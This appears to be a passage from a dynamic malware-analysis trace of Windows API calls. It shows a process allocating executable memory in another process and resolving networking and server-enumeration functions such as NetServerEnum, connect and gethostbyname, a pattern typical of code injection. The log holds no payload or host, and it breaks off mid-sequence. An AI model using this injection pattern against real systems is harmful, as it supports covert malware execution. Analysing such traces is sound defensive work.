	[0240.300] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.300] lstrlenA (lpString="atoi") returned 4
	[0240.300] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.301] ResetEvent (hEvent=0x680) returned 1
	[0240.301] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.301] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.301] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.301] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.302] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.302] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.302] lstrlenA (lpString="vfprintf") returned 8
	[0240.302] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.303] ResetEvent (hEvent=0x680) returned 1
	[0240.303] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.303] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.303] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.304] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.304] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.304] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.304] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.304] lstrlenA (lpString="wcslen") returned 6
	[0240.304] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.305] ResetEvent (hEvent=0x680) returned 1
	[0240.305] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.305] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.305] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.306] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.306] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.306] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.306] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0240.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd198, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0240.306] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0240.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd198, cbMultiByte=-1, lpWideCharStr=0x27c0648, cchWideChar=13 | out: lpWideCharStr="NETAPI32.dll") returned 13
	[0240.306] lstrlenW (lpString="NETAPI32.dll") returned 12
	[0240.306] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.307] ResetEvent (hEvent=0x680) returned 1
	[0240.307] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.322] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0240.322] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.322] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.322] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.322] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1
	[0240.322] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.322] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.322] lstrlenA (lpString="NetApiBufferFree") returned 16
	[0240.322] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.323] ResetEvent (hEvent=0x680) returned 1
	[0240.323] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.323] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.323] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.324] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.324] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.324] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.324] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.324] lstrlenA (lpString="NetServerEnum") returned 13
	[0240.324] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.325] ResetEvent (hEvent=0x680) returned 1
	[0240.325] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.326] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.326] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.326] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.326] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.327] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.327] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0240.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd1b4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0240.327] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0240.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd1b4, cbMultiByte=-1, lpWideCharStr=0x27c0648, cchWideChar=10 | out: lpWideCharStr="ole32.dll") returned 10
	[0240.327] lstrlenW (lpString="ole32.dll") returned 9
	[0240.327] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.328] ResetEvent (hEvent=0x680) returned 1
	[0240.328] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.331] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0240.331] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.331] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.331] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.331] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1
	[0240.331] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.331] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.331] lstrlenA (lpString="CoInitialize") returned 12
	[0240.331] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.332] ResetEvent (hEvent=0x680) returned 1
	[0240.332] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.332] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.332] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.333] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.333] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.333] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.333] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.333] lstrlenA (lpString="CoUninitialize") returned 14
	[0240.333] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.334] ResetEvent (hEvent=0x680) returned 1
	[0240.334] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.334] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.334] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.335] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.335] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.335] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.335] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.335] lstrlenA (lpString="IIDFromString") returned 13
	[0240.335] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.336] ResetEvent (hEvent=0x680) returned 1
	[0240.336] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.336] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.336] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.336] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.336] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.337] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.337] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0240.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd1c4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0240.337] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0240.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd1c4, cbMultiByte=-1, lpWideCharStr=0x27c0648, cchWideChar=13 | out: lpWideCharStr="OLEAUT32.dll") returned 13
	[0240.337] lstrlenW (lpString="OLEAUT32.dll") returned 12
	[0240.337] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.338] ResetEvent (hEvent=0x680) returned 1
	[0240.338] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.339] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0240.339] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.339] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.339] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.340] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1
	[0240.340] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.340] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.340] lstrlenA (lpString="VariantClear") returned 12
	[0240.340] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.341] ResetEvent (hEvent=0x680) returned 1
	[0240.341] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.341] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.341] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.341] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.341] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.341] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.342] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0240.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd1d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0240.342] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0240.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd1d8, cbMultiByte=-1, lpWideCharStr=0x27c0648, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11
	[0240.342] lstrlenW (lpString="USER32.dll") returned 10
	[0240.342] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.342] ResetEvent (hEvent=0x680) returned 1
	[0240.342] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.343] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0240.343] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.343] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.343] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.343] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1
	[0240.343] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.343] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.343] lstrlenA (lpString="wvsprintfW") returned 10
	[0240.343] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.344] ResetEvent (hEvent=0x680) returned 1
	[0240.344] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.344] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.344] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.344] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.344] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.345] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.345] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0240.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd220, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0240.345] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0648
	[0240.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28bd220, cbMultiByte=-1, lpWideCharStr=0x27c0648, cchWideChar=11 | out: lpWideCharStr="WS2_32.dll") returned 11
	[0240.345] lstrlenW (lpString="WS2_32.dll") returned 10
	[0240.345] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.346] ResetEvent (hEvent=0x680) returned 1
	[0240.346] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.348] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0240.348] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.348] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.348] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.348] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0648) returned 1
	[0240.349] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.349] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.349] lstrlenA (lpString="WSAGetLastError") returned 15
	[0240.349] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.350] ResetEvent (hEvent=0x680) returned 1
	[0240.350] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.350] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.350] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.350] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.350] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.351] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.351] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.351] lstrlenA (lpString="WSAStartup") returned 10
	[0240.351] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.352] ResetEvent (hEvent=0x680) returned 1
	[0240.352] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.352] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.352] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.352] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.352] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.353] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.353] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.353] lstrlenA (lpString="__WSAFDIsSet") returned 12
	[0240.353] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.354] ResetEvent (hEvent=0x680) returned 1
	[0240.354] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.354] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.354] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.354] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.354] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.355] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.355] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.355] lstrlenA (lpString="closesocket") returned 11
	[0240.355] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.356] ResetEvent (hEvent=0x680) returned 1
	[0240.356] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.356] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.356] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.356] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.356] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.356] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.357] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.357] lstrlenA (lpString="connect") returned 7
	[0240.357] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.357] ResetEvent (hEvent=0x680) returned 1
	[0240.357] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.358] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.358] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.358] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.358] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.358] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.358] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.358] lstrlenA (lpString="gethostbyname") returned 13
	[0240.358] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.359] ResetEvent (hEvent=0x680) returned 1
	[0240.359] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0240.359] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0240.359] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x120000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.359] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1630) returned 1
	[0240.359] VirtualFreeEx (hProcess=0x6bc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0240.360] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0240.360] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0240.360] lstrlenA (lpString="htons") returned 5
	[0240.360] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0240.361] ResetEvent (hEvent=0x680) returned 1
